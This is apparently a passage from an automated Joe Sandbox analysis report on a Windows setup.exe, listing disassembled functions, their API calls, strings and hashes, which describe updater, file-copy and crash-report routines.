                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                          • Instruction ID: 5b2bf14ad3e241bb380980b9a191b8c89bccaf350f488bccfa17ad64860014da
                                                                                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                          • Instruction Fuzzy Hash: 79110B7724008243D6348AEDF4F45BA9795EAD632072D437DD0A98B75AD2629A47B500
                                                                                                                          Function 00C2A27A Relevance: .1, Instructions: 75COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0d810e0b9deb36ff65d62c3006b06995bec8f02f4f5d0a40ae685987b8664e8d
                                                                                                                          • Instruction ID: 50f6ed773b61f3fc227b7d18f8db406512775060f9bef5d7d4ddf2e5f67b920e
                                                                                                                          • Opcode Fuzzy Hash: 0d810e0b9deb36ff65d62c3006b06995bec8f02f4f5d0a40ae685987b8664e8d
                                                                                                                          • Instruction Fuzzy Hash: 232178315340F14A870D873AAC61637BF909B4730338B42AFE9ABEA1D2C529D564DBB0
                                                                                                                          Function 00C91DC0 Relevance: .0, Instructions: 47COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6a6cf738af90754526f07f238ba3664dae4d81364b6edb0625e48981d956f27c
                                                                                                                          • Instruction ID: ab2230d27d0cb130e90570bc6114c9c1a378f9595119948f19f5ea268804cb8e
                                                                                                                          • Opcode Fuzzy Hash: 6a6cf738af90754526f07f238ba3664dae4d81364b6edb0625e48981d956f27c
                                                                                                                          • Instruction Fuzzy Hash: AC0124B29283458BC754FFB9DD86B0FB653BF8032434AC76DD2158146ACE388409AA59
                                                                                                                          Function 00C1F9AA Relevance: 96.7, APIs: 35, Strings: 20, Instructions: 422stringfiletimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,4641B5ED,?,?,?,?,?,?,00C6FAE0,00CB9540,000000FE,?,00C19959), ref: 00C1FA16
                                                                                                                          • lstrcatW.KERNEL32(?,MCCrashDump\,?,?,?,?,?,?,00C6FAE0,00CB9540,000000FE,?,00C19959), ref: 00C1FA30
                                                                                                                          • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,00C6FAE0,00CB9540,000000FE,?,00C19959), ref: 00C1FA50
                                                                                                                          • wsprintfW.USER32 ref: 00C1FA99
                                                                                                                            • Part of subcall function 00C23951: GetFileAttributesW.KERNEL32(?,00000001,00C2393B,?,?,?,?,?,?,?,?,?,00000354,00C15963), ref: 00C2395D
                                                                                                                          • lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FAC9
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FAD2
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000206,?,?,?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FB14
                                                                                                                          • lstrcpyW.KERNEL32(?,Unknown,?,?,?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FB2A
                                                                                                                          • lstrcpyW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FB3F
                                                                                                                          • lstrcpyW.KERNEL32(00000000,ErrorLog.txt,?,?,?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FB58
                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,80000080,00000000), ref: 00C1FB70
                                                                                                                          • OutputDebugStringW.KERNEL32(Error creating exception report,?,?,?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FB88
                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FBAF
                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00C1FBF6
                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,0000040E), ref: 00C1FC12
                                                                                                                          • wsprintfW.USER32 ref: 00C1FCCD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$lstrcpy$ModuleNamewsprintf$AttributesCreateDebugLocalOutputPathPointerQueryStringTempTimeVirtuallstrcatlstrlen
                                                                                                                          • String ID: ===== [end of %s] =====$Bytes at CS:EIP:$ /auto$" "$%02x $%s caused %s (0x%08p) in module %s at %04p:%08p.$%s location %08x caused an access violation.$%s%d-%02d-%02d-%02d%02d%02d\$ASUSWSShellExt$Crash$Error creating exception report$ErrorLog.txt$Exception handler called in %s.$MCCrash.dmp$MCCrashDump\$MultiCrashReport.exe$Read from$The crash was caused by : %sYou should uninstall the ASUS shell extension.Or reinstall a new version that you download from AS$Unknown$Write to
                                                                                                                          • API String ID: 366537910-80639023
                                                                                                                          • Opcode ID: 17a4545208286d4d37a3c4151a02942522e97ff198742348f9095cc365bd8161
                                                                                                                          • Instruction ID: 10bb12c370a7f9fdd5e043a9a5cc8d602287f682f21238d24624f56b6d1d069b
                                                                                                                          • Opcode Fuzzy Hash: 17a4545208286d4d37a3c4151a02942522e97ff198742348f9095cc365bd8161
                                                                                                                          • Instruction Fuzzy Hash: 77F140B1900628AFDB24EB60DC89FEE77BCAB09714F0045A6F509E2191DB749F85DF60
                                                                                                                          Function 00C15998 Relevance: 54.7, APIs: 11, Strings: 20, Instructions: 451sleepfilewindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C159A2
                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00C159F8
                                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00000104), ref: 00C15A07
                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00C15A86
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00CAE150,00CAE150,00000005), ref: 00C15AAD
                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00C15AB8
                                                                                                                          • PostMessageW.USER32(00000000,00008154,00000000,00000000), ref: 00C15ACC
                                                                                                                            • Part of subcall function 00C15588: __EH_prolog3_GS.LIBCMT ref: 00C1558F
                                                                                                                            • Part of subcall function 00C038F1: _Deallocate.LIBCONCRT ref: 00C03906
                                                                                                                            • Part of subcall function 00C24510: __EH_prolog3_catch.LIBCMT ref: 00C24517
                                                                                                                            • Part of subcall function 00C24510: GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C2452A
                                                                                                                            • Part of subcall function 00C24510: GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00C2455A
                                                                                                                            • Part of subcall function 00C24510: VerQueryValueW.VERSION(00000000,00CB038C,?,?), ref: 00C2457C
                                                                                                                            • Part of subcall function 00C24510: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 00C245A7
                                                                                                                            • Part of subcall function 00C24510: GetUserDefaultLangID.KERNEL32(00000000,00000000,?,?,?,?,00000354,00C15963), ref: 00C245B9
                                                                                                                            • Part of subcall function 00C24510: GetUserDefaultLangID.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,00000354,00C15963), ref: 00C245D4
                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00C15EC3
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00C15F97
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00C15FA8
                                                                                                                          • Sleep.KERNEL32 ref: 00C16010
                                                                                                                          Strings
                                                                                                                          • Backup existing version to %s, xrefs: 00C15C6A
                                                                                                                          • Failed to unpack %s Update..., xrefs: 00C15F25
                                                                                                                          • Update FAILED., xrefs: 00C15FE1
                                                                                                                          • Unzip update into "%s"., xrefs: 00C15EDD
                                                                                                                          • Failed to create backup folder : %s, xrefs: 00C15CAC
                                                                                                                          • Running Installer..., xrefs: 00C15A6A
                                                                                                                          • Unpacking %s Update..., xrefs: 00C15E0C
                                                                                                                          • Remove temporary file : "%s", xrefs: 00C15F72
                                                                                                                          • Updating %s..., xrefs: 00C15FB2
                                                                                                                          • Backup completed., xrefs: 00C15D18
                                                                                                                          • Backuping existing version., xrefs: 00C15AF8
                                                                                                                          • Saving installer to temp folder...., xrefs: 00C15A4B
                                                                                                                          • Saving update file to : "%s"., xrefs: 00C15DF3
                                                                                                                          • Create folder : "%s"., xrefs: 00C15E9D
                                                                                                                          • Finished..., xrefs: 00C15FE6, 00C15FF4
                                                                                                                          • %d.%d.%d.%d, xrefs: 00C15C11
                                                                                                                          • Turn off Backup setting if you want to Upgrade without doing a backup, xrefs: 00C15CB9
                                                                                                                          • open, xrefs: 00C15AA5
                                                                                                                          • Downloaded completed..., xrefs: 00C159BC
                                                                                                                          • Failed to copy existing version to backup. Turn off Backup setting if you want to Upgrade without doing a backup, xrefs: 00C15CF0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep$File$DefaultH_prolog3_InfoLangPathQueryUserValueVersion$CreateDeallocateDeleteDirectoryExecuteH_prolog3_catchLongMessageNamePostShellSizeTemp
                                                                                                                          • String ID: %d.%d.%d.%d$Backup completed.$Backup existing version to %s$Backuping existing version.$Create folder : "%s".$Downloaded completed...$Failed to copy existing version to backup. Turn off Backup setting if you want to Upgrade without doing a backup$Failed to create backup folder : %s$Failed to unpack %s Update...$Finished...$Remove temporary file : "%s"$Running Installer...$Saving installer to temp folder....$Saving update file to : "%s".$Turn off Backup setting if you want to Upgrade without doing a backup$Unpacking %s Update...$Unzip update into "%s".$Update FAILED.$Updating %s...$open
                                                                                                                          • API String ID: 3121452689-2531768170
                                                                                                                          • Opcode ID: 0e9ee5247b425699b137dcb4c43c6a2d51e74d903f5c1850576683d69d4952d7
                                                                                                                          • Instruction ID: 52cb34c6439fd70f31c978137c5c9b4c62c7b1de52223ba16c02f611c5625e47
                                                                                                                          • Opcode Fuzzy Hash: 0e9ee5247b425699b137dcb4c43c6a2d51e74d903f5c1850576683d69d4952d7
                                                                                                                          • Instruction Fuzzy Hash: C4025971901229EFDB24EBA0CC9AFE9B778AF55304F2040EAE00967192DB715F84EF51
                                                                                                                          Function 00C16EAF Relevance: 44.2, APIs: 6, Strings: 19, Instructions: 459COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _strlen.LIBCMT ref: 00C16ED3
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C16F1A
                                                                                                                          • _Deallocate.LIBCONCRT ref: 00C17301
                                                                                                                          • _Deallocate.LIBCONCRT ref: 00C1731F
                                                                                                                          • _Deallocate.LIBCONCRT ref: 00C1733B
                                                                                                                          • _Deallocate.LIBCONCRT ref: 00C17357
                                                                                                                            • Part of subcall function 00C17951: __EH_prolog3_GS.LIBCMT ref: 00C17958
                                                                                                                            • Part of subcall function 00C17951: _strlen.LIBCMT ref: 00C17975
                                                                                                                            • Part of subcall function 00C17951: GetFileAttributesW.KERNEL32(?,00000000,00000024,00C170C4,?), ref: 00C179B9
                                                                                                                            • Part of subcall function 00C17951: GetFileAttributesW.KERNEL32(?,.bak,00000000,?,00000000), ref: 00C17A33
                                                                                                                            • Part of subcall function 00C17951: MoveFileW.KERNEL32(?,?), ref: 00C17A6B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Deallocate$File$AttributesH_prolog3__strlen$Move
                                                                                                                          • String ID: %S$BACKUP$COPY$COPYREGVALUE$DELETE$DELETEALL$DOCRASH$MAKEDIR$MOVE$MSG$REG$RENAME$SETFROMXML$SHOW$Unknown command : %S$XCOPY$XMLDELETE$XMLINSERT$XMLMERGE
                                                                                                                          • API String ID: 3830453046-910192202
                                                                                                                          • Opcode ID: a3746a9bac48abe833e48a81f1df9277c7239858b603aa485205fbabacb64567
                                                                                                                          • Instruction ID: c085166f1be90bcbb1c7f6bc48725725af609e0ef496efc487200933ce3d0268
                                                                                                                          • Opcode Fuzzy Hash: a3746a9bac48abe833e48a81f1df9277c7239858b603aa485205fbabacb64567
                                                                                                                          • Instruction Fuzzy Hash: B9D1B871E08206BADF14EAF9D8465ED7BB89F57320F20416EF405E7282DE309E46B652
                                                                                                                          Function 00C38CA1 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 261windowregistryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C3E462: __EH_prolog3.LIBCMT ref: 00C3E47F
                                                                                                                          • RegisterWindowMessageW.USER32(commdlg_LBSelChangedNotify), ref: 00C38CFA
                                                                                                                          • RegisterWindowMessageW.USER32(commdlg_ShareViolation), ref: 00C38D0A
                                                                                                                          • RegisterWindowMessageW.USER32(commdlg_FileNameOK), ref: 00C38D1A
                                                                                                                          • RegisterWindowMessageW.USER32(commdlg_ColorOK), ref: 00C38D2A
                                                                                                                          • RegisterWindowMessageW.USER32(commdlg_help), ref: 00C38D3A
                                                                                                                          • RegisterWindowMessageW.USER32(commdlg_SetRGBColor), ref: 00C38D4A
                                                                                                                          • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 00C38E72
                                                                                                                            • Part of subcall function 00C32C8F: SetWindowLongW.USER32(?,000000FC,00C2F2FC), ref: 00C32CD3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageWindow$Register$H_prolog3LongSend
                                                                                                                          • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                                                                          • API String ID: 1550484310-3888057576
                                                                                                                          • Opcode ID: 15d55f7bd85a4dde0642cdd5a4e7f84fcdacc2da85b7e282550e6fe1ab8a9087
                                                                                                                          • Instruction ID: 16ef31071d7465fafa56fd58217523fa2d452903ff13fad4f92aecf42d9c4f51
                                                                                                                          • Opcode Fuzzy Hash: 15d55f7bd85a4dde0642cdd5a4e7f84fcdacc2da85b7e282550e6fe1ab8a9087
                                                                                                                          • Instruction Fuzzy Hash: 34810236710611AFCB116F65EC88BBE3769FB84350F0A002AF911A7291DF74DE419BA1
                                                                                                                          Function 00C1763C Relevance: 35.3, APIs: 7, Strings: 13, Instructions: 253sleepCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C17643
                                                                                                                          • _strlen.LIBCMT ref: 00C1767E
                                                                                                                          • _strlen.LIBCMT ref: 00C176CD
                                                                                                                          • GetFileAttributesW.KERNEL32(?,IGNORE_SHAREINGERROR,00000000,00000000,00000058,00C1702B,?), ref: 00C17723
                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C17741
                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 00C1780E
                                                                                                                            • Part of subcall function 00C23D24: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,00000000,00C94050,000000FF), ref: 00C23D47
                                                                                                                            • Part of subcall function 00C23D24: GetLastError.KERNEL32(?,00000000,00C94050,000000FF), ref: 00C23D50
                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 00C1786B
                                                                                                                            • Part of subcall function 00C189E2: _strlen.LIBCMT ref: 00C189EB
                                                                                                                          Strings
                                                                                                                          • File replaced successfully., xrefs: 00C17896
                                                                                                                          • Failed to replace %s due to error %d..., xrefs: 00C178F4
                                                                                                                          • Failed to replace %s due to Sharing violation..., xrefs: 00C177F9
                                                                                                                          • Copy : "%s" -> "%s", xrefs: 00C1777E
                                                                                                                          • , xrefs: 00C177CA
                                                                                                                          • Failed.... Retrying again in 2sec (Error Code : %d), xrefs: 00C17856
                                                                                                                          • IGNORE_FILENOTFOUND, xrefs: 00C178AE
                                                                                                                          • Failed to replace %s, file not found. Expected result. Ignoring error., xrefs: 00C178CB
                                                                                                                          • IGNORE_SHAREINGERROR, xrefs: 00C17701
                                                                                                                          • Failed to replace %s due to Sharing violation. Ignoring Error, xrefs: 00C177E6
                                                                                                                          • Retrying..., xrefs: 00C17814
                                                                                                                          • Failed to copy file. Invalid parameters, xrefs: 00C17918
                                                                                                                          • Failed... Giving up., xrefs: 00C1787E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File_strlen$AttributesSleep$CreateErrorH_prolog3_Last
                                                                                                                          • String ID: $Copy : "%s" -> "%s"$Failed to copy file. Invalid parameters$Failed to replace %s due to Sharing violation. Ignoring Error$Failed to replace %s due to Sharing violation...$Failed to replace %s due to error %d...$Failed to replace %s, file not found. Expected result. Ignoring error.$Failed... Giving up.$Failed.... Retrying again in 2sec (Error Code : %d)$File replaced successfully.$IGNORE_FILENOTFOUND$IGNORE_SHAREINGERROR$Retrying...
                                                                                                                          • API String ID: 318860920-2674590518
                                                                                                                          • Opcode ID: b20d0b099581e2a48c25c4f71f7f47a93f68869e9bfa414e943da06731cf08de
                                                                                                                          • Instruction ID: 8f2c9505dad85574df95ffb894892cc913ef18aaf6dabc513b37360ab6516f13
                                                                                                                          • Opcode Fuzzy Hash: b20d0b099581e2a48c25c4f71f7f47a93f68869e9bfa414e943da06731cf08de
                                                                                                                          • Instruction Fuzzy Hash: 1FA16AB1D00209EFDB10EFE5C8899EDBBB5EF19314F104229F415A6191DB319E89EBA1
                                                                                                                          Function 00C1EEE0 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 251filestringtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,0000040E,?,00C1F2B2,00000001), ref: 00C1EF52
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,0000040E,?,00C1F2B2,00000001), ref: 00C1EF9E
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,0000040E,?,00C1F2B2,00000001), ref: 00C1EFBC
                                                                                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?,?,?,0000040E,?,00C1F2B2,00000001), ref: 00C1EFD4
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,0000040E,?,00C1F2B2,00000001), ref: 00C1EFF8
                                                                                                                          • lstrcpynW.KERNEL32(?,?,0000018E,?,?,?), ref: 00C1F0B1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateHandleModuleNameSizeTimelstrcpyn
                                                                                                                          • String ID: Company: %s$ FileDesc: %s$ FileVer: %d.%d.%d.%d$ ProdVer: %d.%d.%d.%d$ Product: %s$%s$Checksum: 0x%08x Time Stamp: 0x%08x$File Size: %-10d File Time: %s$Image Base: 0x%08x Image Size: 0x%08x$Module %d$Version Information:
                                                                                                                          • API String ID: 3235147344-2255338270
                                                                                                                          • Opcode ID: 318a0e5af322e61a7a1e3cd3e2234676bd6ece442fbf87fd69610ec782c9cc0c
                                                                                                                          • Instruction ID: a76df41506c46c2e921a59186e8d1f79b5764c39270aa3bca1417d29d34a39f7
                                                                                                                          • Opcode Fuzzy Hash: 318a0e5af322e61a7a1e3cd3e2234676bd6ece442fbf87fd69610ec782c9cc0c
                                                                                                                          • Instruction Fuzzy Hash: FA91A8B2904218BBDB209B64DC41FEE77BCEF49710F1041AAF90AF2181DB359A81DF64
                                                                                                                          Function 00C0E47F Relevance: 30.3, APIs: 20, Instructions: 308COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreatePen.GDI32(00000000,00000001,?), ref: 00C0E6B7
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00C0E6C6
                                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E6DD
                                                                                                                          • LineTo.GDI32(?,?,?), ref: 00C0E6EF
                                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E702
                                                                                                                          • LineTo.GDI32(?,?,?), ref: 00C0E714
                                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E73E
                                                                                                                          • LineTo.GDI32(?,?,?), ref: 00C0E74D
                                                                                                                          • SelectObject.GDI32(?,?), ref: 00C0E76C
                                                                                                                          • DeleteObject.GDI32(?), ref: 00C0E776
                                                                                                                          • CreatePen.GDI32(00000000,00000001,?), ref: 00C0E7C5
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00C0E7D4
                                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E7EC
                                                                                                                          • LineTo.GDI32(?,?,?), ref: 00C0E7FE
                                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E812
                                                                                                                          • LineTo.GDI32(?,?,?), ref: 00C0E826
                                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E84F
                                                                                                                          • LineTo.GDI32(?,?,?), ref: 00C0E85B
